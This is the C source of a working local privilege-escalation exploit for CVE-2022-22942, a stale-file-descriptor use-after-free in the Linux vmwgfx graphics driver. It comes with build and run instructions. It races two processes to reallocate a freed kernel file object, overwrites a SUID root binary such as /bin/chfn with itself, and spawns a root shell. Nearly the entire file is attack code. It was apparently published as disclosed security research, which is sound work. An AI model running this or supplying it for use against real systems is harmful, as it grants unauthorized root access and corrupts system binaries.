/* The vmwgfx driver has a similar bug as the one we fixed last year in the
 * nitro enclaves code (https://git.kernel.org/linus/f1ce3986baa6
 * "nitro_enclaves: Fix stale file descriptors on failed usercopy").
 *
 * If the driver fails to copy the 'fence_rep' object to userland, it tries to
 * recover by deallocating the (already populated) file descriptor. This is
 * wrong, as the fd gets released via put_unused_fd() which shouldn't be used,
 * as the fd table slot was already populated via the previous call to
 * fd_install(). This leaves userland with a valid fd table entry pointing to
 * a free'd 'file' object.
 *
 * There are multiple ways to exploit this bug. A previous version of this PoC
 * dumped the contents of /etc/shadow. This one overwrites a SUID root binary
 * to pop a shell.
 *
 * Compile as:
 *   $ gcc -O2 cve-2022-22942-dc.c -o cve-2022-22942-dc
 *
 * Run as (and wait for the root shell to appear):
 *   $ ./cve-2022-22942-dc [target_file [temp_file [dev_node]]]
 *
 * Remarks:
 *
 * This POC assumes it has access to '/dev/dri/card0' which likely means the
 * calling user needs to be part of the 'video' group.
 *
 * Alternatively '/dev/dri/renderD128' can be used (just pass the path as the
 * third argument to ./cve-2022-22942-dc), which, under Debian, means being
 * part of the 'render' group.
 *
 * This bug was fixed by commit a0f90c881570 ("drm/vmwgfx: Fix stale file
 * descriptors on failed usercopy"). It affected kernel versions v4.14-rc1 to
 * v5.17-rc1.
 *
 * This is CVE-2022-22942.
 *
 * (c) 2022 Open Source Security, Inc.
 *
 * - minipli
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */

#define _GNU_SOURCE
#include <sys/sysmacros.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <err.h>

/* uapi/drm/drm.h
 *
 * Local copies of the few generic DRM definitions this program uses; no DRM
 * header is included by this file, so the ioctl request numbers are built
 * here from the _IOW()/_IOWR() helpers.
 */
#define DRM_IOCTL_BASE		'd'
#define DRM_IOW(nr,type)	_IOW(DRM_IOCTL_BASE,nr,type)
#define DRM_IOWR(nr,type)	_IOWR(DRM_IOCTL_BASE,nr,type)
/* Added to a driver command number to form the ioctl 'nr' (see
 * DRM_IOCTL_VMW_EXECBUF below).
 */
#define DRM_COMMAND_BASE	0x40

/* Argument block for DRM_IOCTL_VERSION.
 *
 * In this program the caller supplies three buffers together with their
 * sizes (name, date, desc) and only reads 'name' back afterwards to compare
 * it against the expected driver name. The version_* members are not read
 * anywhere in this file.
 *
 * NOTE(review): the member order and types are assumed to match the kernel's
 * definition in the header named above -- confirm against that header before
 * changing anything here.
 */
#define DRM_IOCTL_VERSION	DRM_IOWR(0x00, struct drm_version)
struct drm_version {
	int version_major;
	int version_minor;
	int version_patchlevel;
	size_t name_len;	/* size of the buffer behind 'name' */
	char *name;			/* compared against VMWGFX_DRV_NAME */
	size_t date_len;	/* size of the buffer behind 'date' */
	char *date;
	size_t desc_len;	/* size of the buffer behind 'desc' */
	char *desc;
};

/* uapi/drm/vmwgfx_drm.h
 *
 * Local copies of the vmwgfx-specific definitions needed for the execbuf
 * ioctl; the values are taken as given from the header named above.
 */
#define DRM_VMW_EXECBUF							12
#define DRM_VMW_EXECBUF_VERSION					2
#define DRM_VMW_EXECBUF_FLAG_EXPORT_FENCE_FD	(1 << 1)
#define DRM_VMW_INVALID_CTX_HNDL				(-1)

/* Argument block for DRM_IOCTL_VMW_EXECBUF.
 *
 * The only instance in this file (in get_stale_fd()) sets 'version', 'flags',
 * 'context_handle' and 'fence_rep'; every other member is left at zero by
 * the static initializer.
 *
 * NOTE(review): the layout is assumed to match the kernel's definition --
 * confirm against the header named above before changing anything here.
 */
#define DRM_IOCTL_VMW_EXECBUF \
	 DRM_IOW(DRM_COMMAND_BASE + DRM_VMW_EXECBUF, struct drm_vmw_execbuf_arg)
struct drm_vmw_execbuf_arg {
	uint64_t commands;
	uint32_t command_size;
	uint32_t throttle_us;
	uint64_t fence_rep;			/* user address, passed as an integer */
	uint32_t version;			/* set to DRM_VMW_EXECBUF_VERSION */
	uint32_t flags;				/* set to DRM_VMW_EXECBUF_FLAG_EXPORT_FENCE_FD */
	uint32_t context_handle;	/* set to DRM_VMW_INVALID_CTX_HNDL */
	int32_t imported_fence_fd;
};

/* Number of elements of a true array 'x' (not valid for pointers). */
#define array_size(x)	(sizeof(x)/sizeof*(x))

/* Value stored in drm_vmw_execbuf_arg.fence_rep by get_stale_fd(). The file
 * header explains that the bug is reached when the driver fails to copy the
 * 'fence_rep' object to userland.
 */
#define FENCE_REP_PTR		0x42
/* Driver name that DRM_IOCTL_VERSION must report for the run to continue. */
#define VMWGFX_DRV_NAME		"vmwgfx"
/* Defaults for the three optional command line arguments (see main()). */
#define VMWGFX_DEV			"/dev/dri/card0"
#define NULL_DEV			"/dev/null"
#define SUID_TARGET			"/bin/chfn"	// use /bin/chage for RHEL/CentOS
#define TEMP_FILE			"/var/tmp/cake"

/* Effective paths; main() replaces these with argv[1..3] when given. */
static char *suid_path = SUID_TARGET;
static char *temp_path = TEMP_FILE;
static char *dev_path = VMWGFX_DEV;
/* "/proc/self/fd/<n>" string written by get_stale_fd() and read by
 * check_fd().
 */
static char stale_fd_path[64];

/* Read-only mappings (and their sizes) of this program and of the target
 * file, set up by main() through map_file().
 */
static const void *prog_addr, *suid_addr;
static size_t prog_size, suid_size;

/* Descriptor table filled by open_files() and walked by close_files() and
 * find_file().
 */
#define NUM_FILES 32
static int files[NUM_FILES];

/* Fill every slot of files[] with a fresh descriptor for 'path'.
 *
 * path:  file to open, once per slot
 * flags: open(2) flags
 * mode:  open(2) creation mode
 * temp:  when true, the path is unlinked right after each open and the
 *        descriptor is resized to prog_size bytes
 *
 * Any failing open() or ftruncate() terminates the process via err(); the
 * result of unlink() is deliberately not checked.
 */
static void open_files(const char *path, int flags, mode_t mode, bool temp) {
	int *slot;

	for (slot = files; slot < files + array_size(files); slot++) {
		*slot = open(path, flags, mode);
		if (*slot < 0)
			err(1, "open('%s', %hx, %hx)", path, flags, mode);

		if (!temp)
			continue;

		/* drop the name again, the descriptor keeps the file alive */
		unlink(path);

		if (ftruncate(*slot, prog_size) != 0)
			err(1, "ftruncate()");
	}
}

/* Close every descriptor stored in files[] except the one whose number
 * equals 'except'. Passing a value that matches no descriptor (callers use
 * -1) closes all of them.
 *
 * The entries of files[] are left untouched. A failing close() terminates
 * the process via err().
 */
static void close_files(unsigned int except) {
	const int *slot = files;
	size_t remaining = array_size(files);

	while (remaining-- > 0) {
		const int fd = *slot++;

		if ((unsigned int)fd != except && close(fd) != 0)
			err(1, "close(fd=%d)", fd);
	}
}

/* Look up the descriptor in files[] that refers to inode number 'ino'.
 *
 * Returns the first matching descriptor, or -1 when none matches. A failing
 * fstat() terminates the process via err().
 */
static int find_file(ino_t ino) {
	size_t idx = 0;

	while (idx < array_size(files)) {
		const int fd = files[idx++];
		struct stat st;

		if (fstat(fd, &st) != 0)
			err(1, "stat(fd=%d)", fd);

		if (st.st_ino == ino)
			return fd;
	}

	return -1;
}

/* Tell whether 'path' is owned by uid 0 and has the set-user-ID bit as well
 * as all three execute bits set.
 *
 * Returns false when stat() fails for any reason.
 */
static bool is_suid(const char *path) {
	/* set-user-ID (04000) plus execute for user, group and others (0111) */
	const mode_t wanted = 04111;
	struct stat st;

	if (stat(path, &st) != 0)
		return false;

	if (st.st_uid != 0)
		return false;

	return (st.st_mode & wanted) == wanted;
}

/* Restrict the calling thread to the single CPU 'cpu'.
 *
 * Note the inverted sense of the result: true means sched_setaffinity()
 * FAILED, false means the affinity was applied.
 */
static bool pin_cpu(int cpu) {
	cpu_set_t mask;

	CPU_ZERO(&mask);
	CPU_SET(cpu, &mask);

	if (sched_setaffinity(0, sizeof(mask), &mask) != 0)
		return true;

	return false;
}

/* Create a shared, read-only mapping covering the whole of 'path'.
 *
 * path: file to map
 * len:  receives the file size as reported by fstat()
 *
 * Returns the start of the mapping. One byte is read every 4096 bytes so the
 * mapping is faulted in before the function returns. The descriptor used for
 * the mapping is closed again. Any failure terminates the process via err().
 */
static void *map_file(const char *path, size_t *len) {
	const volatile char *probe;
	struct stat st;
	size_t off;
	void *base;
	int fd;

	printf("[~] creating r/o mapping of %s...\n", path);

	fd = open(path, O_RDONLY);
	if (fd < 0)
		err(1, "open(%s)", path);

	if (fstat(fd, &st) != 0)
		err(1, "stat(%s)", path);

	*len = st.st_size;

	base = mmap(NULL, *len, PROT_READ, MAP_SHARED, fd, 0);
	if (base == MAP_FAILED)
		err(1, "mmap(%s)", path);

	/* volatile reads cannot be dropped by the compiler, so every touched
	 * page really gets accessed
	 */
	probe = base;
	for (off = 0; off < *len; off += 4096)
		(void)probe[off];

	close(fd);

	return base;
}

/* Ask the vmwgfx driver to export a fence fd and return the descriptor
 * number that export is expected to have used.
 *
 * dev_path: DRM device node to open on the first call. The parameter shadows
 *           the file-scope variable of the same name.
 *
 * On the first call the device is opened write-only and DRM_IOCTL_VERSION is
 * used to confirm the driver name is VMWGFX_DRV_NAME; the device descriptor
 * is cached in a static variable for later calls.
 *
 * The returned number is a prediction made by this function (see below), it
 * is not reported back by the driver. As a side effect stale_fd_path is set
 * to "/proc/self/fd/<returned number>".
 *
 * Every failing step terminates the process via err()/errx().
 */
static int get_stale_fd(const char *dev_path) {
	static char name[256], date[256], desc[256];
	static struct drm_version drm_info = {
		.name = name, .name_len = sizeof(name),
		.desc = desc, .desc_len = sizeof(desc),
		.date = date, .date_len = sizeof(date),
	};
	/* fence_rep carries FENCE_REP_PTR; the file header describes the bug as
	 * being reached when the driver fails to copy 'fence_rep' to userland
	 */
	static struct drm_vmw_execbuf_arg exec_buf = {
		.version = DRM_VMW_EXECBUF_VERSION,
		.context_handle = DRM_VMW_INVALID_CTX_HNDL,
		.flags = DRM_VMW_EXECBUF_FLAG_EXPORT_FENCE_FD,
		.fence_rep = FENCE_REP_PTR,
	};
	static int vmw_fd = -1;
	int fd;

	if (vmw_fd < 0) {
		printf("[~] vmwgfx setup using %s...\n", dev_path);
		vmw_fd = open(dev_path, O_WRONLY);
		if (vmw_fd < 0)
			err(1, "open(%s)", dev_path);

		if (ioctl(vmw_fd, DRM_IOCTL_VERSION, &drm_info) != 0)
			err(1, "ioctl(DRM_IOCTL_VERSION) unexpectedly failed");

		if (strcmp(drm_info.name, VMWGFX_DRV_NAME) != 0) {
			errx(1, "wrong driver, should be '%s' but is '%s'",
			     VMWGFX_DRV_NAME, drm_info.name);
		}
		printf("[+] confirmed to be targeting the right driver\n");
	}

	/* Open and immediately close a throw-away descriptor: its number is
	 * taken as the one the following fence fd export will be given
	 * (presumably because the next allocation reuses the number just freed
	 * -- this relies on nothing else opening a descriptor in between).
	 */
	fd = open(NULL_DEV, O_RDONLY);
	if (fd < 0)
		err(1, "open(%s)", NULL_DEV);
	close(fd);
	printf("[~] predicted fence fd = %d\n", fd);
	snprintf(stale_fd_path, sizeof(stale_fd_path), "/proc/self/fd/%d", fd);

	/* the ioctl itself is expected to report success */
	printf("[~] triggering fence fd export...\n");
	if (ioctl(vmw_fd, DRM_IOCTL_VMW_EXECBUF, &exec_buf) != 0)
		err(1, "ioctl(DRM_IOCTL_VMW_EXECBUF) unexpectedly failed");

	return fd;
}

/* Run a series of probes on 'fd' and report whether all of them pass.
 *
 * fd:   descriptor to examine
 * path: expected prefix of the link target of stale_fd_path
 * ino:  receives the inode number of 'fd'; written only on success
 *
 * The probes, in order:
 *   1. a write() from an invalid address must fail with EFAULT
 *   2. the status flags must have both bits of O_RDWR set
 *   3. readlink() of stale_fd_path must succeed and its result must start
 *      with 'path' (a prefix match only, trailing text is ignored)
 *   4. fstat() must succeed
 *
 * Note that probe 3 uses the file-scope stale_fd_path string rather than a
 * path derived from the 'fd' argument.
 */
static bool check_fd(int fd, const char *path, ino_t *ino) {
	char target[1024];
	struct stat st;
	ssize_t written, target_len;
	int status_flags;

	/* Do non-faulting checks first -- using an invalid address ;) */
	errno = 0;
	written = write(fd, (void *)~0xdead, 42);
	if (written >= 0)
		return false;
	if (errno != EFAULT)
		return false;

	/* We open the file with exactly these flags */
	status_flags = fcntl(fd, F_GETFL);
	if ((status_flags & O_RDWR) != O_RDWR)
		return false;

	target_len = readlink(stale_fd_path, target, sizeof(target) - 1);
	if (target_len < 0)
		return false;
	target[target_len] = '\0';

	if (strncmp(target, path, strlen(path)) != 0)
		return false;

	if (fstat(fd, &st) != 0)
		return false;

	*ino = st.st_ino;

	return true;
}

/* Read exactly 'len' bytes from 'fd' into 'buf' with a single read() call.
 *
 * what:   name of the object being read, used in diagnostics only
 * caller: name of the calling function, used in diagnostics only
 *
 * Returns only when the read delivered exactly 'len' bytes. Otherwise the
 * process is terminated: exit code 1 for a read error or a short read, exit
 * code 2 when read() returned 0.
 */
static void __read_pipe(int fd, void *buf, size_t len, const char *what, const char *caller) {
	const ssize_t got = read(fd, buf, len);

	if (got > 0 && (size_t)got == len)
		return;

	if (got < 0)
		err(1, "%s: read(%s)", caller, what);

	if (got == 0)
		errx(2, "%s: read(%s) EOF, other side died?", caller, what);

	errx(1, "%s: short read(%s): got %zd, want %zu", caller, what, got, len);
}
/* Read object 'o' from the read end (index 0) of pipe pair 'p'. */
#define read_pipe(p,o)	__read_pipe(p[0], &o, sizeof(o), #o, __func__)

/* Write exactly 'len' bytes from 'buf' to 'fd' with a single write() call.
 *
 * what:   name of the object being written, used in diagnostics only
 * caller: name of the calling function, used in diagnostics only
 *
 * Returns only when the write accepted exactly 'len' bytes. Otherwise the
 * process is terminated: exit code 1 for a write error or a short write,
 * exit code 2 when write() returned 0.
 */
static void __write_pipe(int fd, const void *buf, size_t len, const char *what, const char *caller) {
	const ssize_t put = write(fd, buf, len);

	if (put > 0 && (size_t)put == len)
		return;

	if (put < 0)
		err(1, "%s: write(%s)", caller, what);

	if (put == 0)
		errx(2, "%s: write(%s) EOF, other side died?", caller, what);

	errx(1, "%s: short write(%s): got %zd, want %zu", caller, what, put, len);
}
/* Write object 'o' to the write end (index 1) of pipe pair 'p'. */
#define write_pipe(p,o)	__write_pipe(p[1], &o, sizeof(o), #o, __func__)

/* One half of the lock-stepped state machine; handles the even states '0',
 * '2' and '4'. The odd states are handled by mmap_worker().
 *
 * pipe: pipe[0] is read from, pipe[1] is written to (see read_pipe() and
 *       write_pipe())
 *
 * Each loop iteration performs the action for the current state, sends the
 * resulting state to the peer (followed by the inode number when a match
 * was just found) and then blocks until the peer sends the next state. The
 * loop ends once a state of '6' or above is received.
 *
 * Does not return: the process exits with the result of comparing the
 * target mapping against this program's mapping, or via errx() on an
 * unexpected state.
 */
static void stale_fd_worker(int pipe[2]) {
	bool write_ino = false;
	int stale_fd = -1;
	char state = '0';
	ino_t ino;

	do {
		switch (state) {
			case '0':
				stale_fd = get_stale_fd(dev_path);
				/* ensure an RCU GP has passed and the file was returned to the cache */
//				usleep(150 * 1000);
				sleep(1);
				printf("[~] RCU GP passed and file object released -- by now or soon!\n");
				state++;
				break;

			case '2':
				printf("[~] probing stale fd for a match...\n");
				if (check_fd(stale_fd, temp_path, &ino)) {
					/* match: advance to '3' and pass the inode along */
					write_ino = true;
					state++;
				} else {
					/* no match: step back to '1' so the peer reopens its files */
					state--;
				}
				break;

			case '4':
				printf("[~] closing stale fd...\n");
				/* This close will drop the reference of the mmap() of stage
				 * '3' and make its file pointer dangling.
				 */
				close(stale_fd);

				/* ensure an RCU GP has passed and the file was released to the cache */
//				usleep(150 * 1000);
				sleep(1);
				printf("[~] RCU GP passed and file object released again -- hopefully!\n");
				state++;
				break;

			default:
				errx(1, "%s: invalid state '%c'", __func__, state);
		}

		/* hand over to the peer, then wait for its answer */
		write_pipe(pipe, state);
		if (write_ino) {
			write_ino = false;
			write_pipe(pipe, ino);
		}
		read_pipe(pipe, state);
	} while (state < '6');

	printf("[~] %s: done\n", __func__);
	/* zero exit status when the first prog_size bytes of both mappings are equal */
	exit(memcmp(suid_addr, prog_addr, prog_size));
}

/* Other half of the lock-stepped state machine; handles the odd states '1',
 * '3' and '5'. The even states are handled by stale_fd_worker().
 *
 * pipe: pipe[0] is read from, pipe[1] is written to (see read_pipe() and
 *       write_pipe())
 *
 * Each loop iteration blocks until the peer sends a state, performs the
 * action for it and sends the resulting state back. The loop ends once the
 * state reaches '6'.
 *
 * Does not return: after the loop the process detaches itself (new session,
 * standard streams and pipe ends closed, all signals blocked) and sleeps in
 * pause() forever. An unexpected state terminates it via errx().
 */
static void mmap_worker(int pipe[2]) {
	bool files_open = false;
	void *addr = NULL;
	sigset_t set;
	char state;
	ino_t ino;
	int fd;

	do {
		read_pipe(pipe, state);

		switch (state) {
			case '1':
				/* on a retry, release the previous batch first */
				if (files_open) {
					files_open = false;
					close_files(-1);
					usleep(20 * 1000);
				}
				printf("[~] opening some r/w files for %s\n", temp_path);
				open_files(temp_path, O_RDWR | O_CREAT | O_TRUNC, 0600, true);
				files_open = true;
				state++;
				break;

			case '3':
				/* found it! */
				/* the peer sends the inode number right after the state */
				read_pipe(pipe, ino);

				fd = find_file(ino);
				if (fd < 0) {
					printf("[-] failed to find candidate with ino %#lx, retrying\n", ino);
					state = '1';
					/* no need to bounce, retry directly */
					/* NOTE(review): inside a do/while, 'continue' jumps to
					 * the loop condition and the body then starts over with
					 * read_pipe(), skipping the write_pipe() below. At this
					 * point stale_fd_worker() appears to be waiting in its
					 * own read_pipe(), so both sides would block -- verify
					 * whether case '1' is really reached "directly" here.
					 */
					continue;
				}

				printf("[+] found match at fd %d\n", fd);
				close_files(fd);

				printf("[~] creating r/w mapping...\n");
				addr = mmap(NULL, prog_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
				if (addr == MAP_FAILED)
					err(1, "mmap()");

				/* the mapping stays in place after the descriptor is closed */
				close(fd);
				state++;
				break;

			case '5':
				printf("[~] opening some r/o files for %s\n", suid_path);
				open_files(suid_path, O_RDONLY, 0, false);

				/* We hope to have reallocated the dangling file once more! */
				printf("[*] trying to overwrite code in %s\n", suid_path);
				memcpy(addr, prog_addr, prog_size);
				//msync(addr, prog_size, MS_SYNC | MS_INVALIDATE);
				printf("[~] %s: done\n", __func__);
				state++;
				break;

			default:
				errx(1, "%s: invalid state '%c'", __func__, state);
		}

		write_pipe(pipe, state);
	} while (state < '6');

	/* The 'addr' mapping is using a dangling file pointer, i.e. one with an
	 * off-by-one reference count. Terminating the process will thereby lead to
	 * a warning in the vfs code: "VFS: Close: file count is 0" or worse,
	 * tripping over DEBUG_LIST checks leading to an Oops.
	 *
	 * To avoid these, turn into a ghost, detach from the process hierarchy and
	 * daemonize.
	 */
	//exit(memcmp(suid_addr, prog_addr, prog_size));

	setsid();

	close(0);
	close(1);
	close(2);
	close(pipe[0]);
	close(pipe[1]);
	prctl(PR_SET_NAME, "bogeyman", 0, 0, 0);

    sigfillset(&set);
    sigprocmask(SIG_BLOCK, &set, NULL);

	/* never exit: sleep until killed */
	for (;;)
		pause();
}

/* Create two pipes, fork, and run the two state machine halves: the parent
 * becomes stale_fd_worker(), the child becomes mmap_worker().
 *
 * Each side keeps the read end of one pipe and the write end of the other
 * and closes the two ends it does not use. Neither worker is expected to
 * return; a failing pipe() or fork() terminates the process via err().
 */
static void spawn_worker(void) {
	int state_fd[2][2];
	pid_t child;

	if (pipe(state_fd[0]) < 0)
		err(1, "pipe()");
	if (pipe(state_fd[1]) < 0)
		err(1, "pipe()");

	child = fork();
	if (child == -1)
		err(1, "fork()");

	if (child == 0) {
		/* child: reads from pipe 1, writes to pipe 0 */
		int ends[2] = { state_fd[1][0], state_fd[0][1] };

		close(state_fd[0][0]);
		close(state_fd[1][1]);
		mmap_worker(ends);
	} else {
		/* parent: reads from pipe 0, writes to pipe 1 */
		int ends[2] = { state_fd[0][0], state_fd[1][1] };

		close(state_fd[0][1]);
		close(state_fd[1][0]);
		stale_fd_worker(ends);
	}

	/* not reached */
	exit(1);
}

/* Program entry point.
 *
 * Usage: prog [target_file [temp_file [dev_node]]]
 *
 * Three modes, selected by the process credentials:
 *   - real uid 0:      refuse to run
 *   - effective uid 0: set uid and gid to 0 and execute /bin/sh (argv[0]
 *                      "-sh", no environment); only returns from there on
 *                      error
 *   - otherwise:       map the target file and this program, fork the helper
 *                      processes, wait for all children, compare the two
 *                      mappings and, if they are equal, execute the target
 *
 * Every failure terminates the process via err()/errx() with exit code 1.
 */
int main(int argc, char **argv) {
	static const char proc_self_exe[] = "/proc/self/exe";
	static const char shell_path[] = "/bin/sh";

	if (!getuid())
		errx(1, "ahem...");

	if (!geteuid()) {
		setuid(0);
		setgid(0);
		execve(shell_path, (char *const []){ "-sh", NULL }, NULL);
		/* report the path that was actually passed to execve() */
		err(1, "execve(%s)", shell_path);
	}

	if (argc >= 2)
		suid_path = argv[1];

	if (argc >= 3)
		temp_path = argv[2];

	if (argc >= 4)
		dev_path = argv[3];

	if (!is_suid(suid_path))
		errx(1, "%s isn't suid root, choose another target", suid_path);

	suid_addr = map_file(suid_path, &suid_size);
	prog_addr = map_file(proc_self_exe, &prog_size);

	/* all later comparisons and copies use prog_size bytes of both mappings */
	if (suid_size < prog_size) {
		errx(1, "size of %s too small, need %zuB, but only have %zuB",
		     suid_path, prog_size, suid_size);
	}

	/* Ensure all subprocesses share the same SLUB's partial lists */
	if (pin_cpu(sched_getcpu()))
		err(1, "failed to pin to CPU");

	/* Spawn two subprocesses that lock step a state machine:
	 * P1: triggers the bug to get a stale fd entry
	 *
	 * P2: opens a bunch of r/w temporary files to reallocate the file object
	 *
	 * P1: checks if one of the fds reallocated the dangling file pointer and
	 *     signals P2 which
	 *
	 * P2: creates a r/w mapping of the fd that matches the reallocated file
	 *     pointer and closes all opened files
	 *
	 * P1: uses its stale fd entry to put the file attached to P2's mapping to
	 *     make it dangling again
	 *
	 * P2: opens the target file r/o multiple times to reallocate the just
	 *     released file object
	 * P2: copies this program over the previously created mapping (now
	 *     pointing to the victim file instead of the temporary file)
	 *
	 * P1: signals success / failure to the observer by checking if the victim
	 *     file was overwritten
	 *
	 * Wait for all children to exit / die. Their exit status is not
	 * inspected; the outcome is determined below by comparing the two
	 * mappings.
	 */

	/* Do the dirty work in subprocesses, to not accidentally die along */
	printf("[~] spawning helper processes...\n");
	switch (fork()) {
		case -1: err(1, "fork()");
		case  0: spawn_worker();	/* does not return */
	}

retry:	/* Reap all the zombies... */
	switch (wait(NULL)) {
		case -1:
			switch (errno) {
				case EINTR: goto retry;
				case ECHILD: break;	/* no children left */
				default: err(1, "wait()");
			}
			break;
		default:
			/* continue reaping... */
			goto retry;
	}

	if (memcmp(suid_addr, prog_addr, prog_size))
		errx(1, "failed to overwrite %s :(", suid_path);

	printf("[$] success, spawning shell...\n");

	/* Should be a suid root version of us by now */
	execve(suid_path, (char *const []){ suid_path, NULL }, NULL);
	err(1, "execve(%s)", suid_path);

	return 0;
}